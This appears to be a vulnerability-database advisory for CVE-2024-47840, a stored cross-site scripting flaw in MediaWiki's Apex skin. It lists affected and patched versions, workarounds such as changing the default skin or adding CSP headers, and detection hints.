Login Sign Up

CVE-2024-47840

4.8 MEDIUM
Cross-Site Scripting

📋 TL;DR

This stored XSS vulnerability in MediaWiki's Apex skin allows attackers to inject malicious scripts into web pages, which execute when other users view those pages. It affects MediaWiki installations using the Apex skin in specific vulnerable versions. Users who view pages with injected scripts could have their sessions hijacked or be redirected to malicious sites.

💻 Affected Systems

Products:
  • MediaWiki with Apex skin
Versions: MediaWiki 1.39.X before 1.39.9, 1.41.X before 1.41.3, 1.42.X before 1.42.2
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects installations using the Apex skin. Other skins are not vulnerable.

📦 What is this software?

Apex by Wikimedia

View all CVEs affecting Apex →

Apex by Wikimedia

View all CVEs affecting Apex →

Apex by Wikimedia

View all CVEs affecting Apex →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator credentials, deface websites, or distribute malware to users viewing compromised pages.

🟠

Likely Case

Session hijacking, cookie theft, or redirection to phishing sites for users viewing pages with injected scripts.

🟢

If Mitigated

Limited impact if proper input validation and output encoding are implemented, though stored XSS remains dangerous.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Requires ability to inject content into pages (typically requires some level of editing permissions).

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: MediaWiki 1.39.9, 1.41.3, or 1.42.2

Vendor Advisory: https://phabricator.wikimedia.org/T368628

Restart Required: No

Instructions:

1. Update MediaWiki to version 1.39.9, 1.41.3, or 1.42.2 or later. 2. Ensure the Apex skin is updated as part of the MediaWiki update. 3. Clear any caches if applicable.

🔧 Temporary Workarounds

Disable Apex skin

all

Switch to a different skin that is not vulnerable

Edit LocalSettings.php and change $wgDefaultSkin to a different skin (e.g., 'vector')

Implement Content Security Policy

all

Add CSP headers to mitigate XSS impact

Add appropriate CSP headers to web server configuration

🧯 If You Can't Patch

  • Restrict editing permissions to trusted users only
  • Implement web application firewall rules to detect and block XSS payloads

🔍 How to Verify

Check if Vulnerable:

Check MediaWiki version and skin configuration in LocalSettings.php

Check Version:

Check the bottom of any MediaWiki page for version information or examine LocalSettings.php

Verify Fix Applied:

Verify MediaWiki version is 1.39.9, 1.41.3, 1.42.2 or later and Apex skin is updated

📡 Detection & Monitoring

Log Indicators:

  • Unusual page edits containing script tags or JavaScript code
  • Multiple failed XSS attempts in web server logs

Network Indicators:

  • Unexpected outbound connections from user browsers after viewing pages

SIEM Query:

Search for pattern: *<script* in page edit logs or web server access logs

📊 Metadata

CVE ID: CVE-2024-47840
CVSS v3 Score: 4.8 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Published: October 5, 2024
Last Updated: October 16, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-47840, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)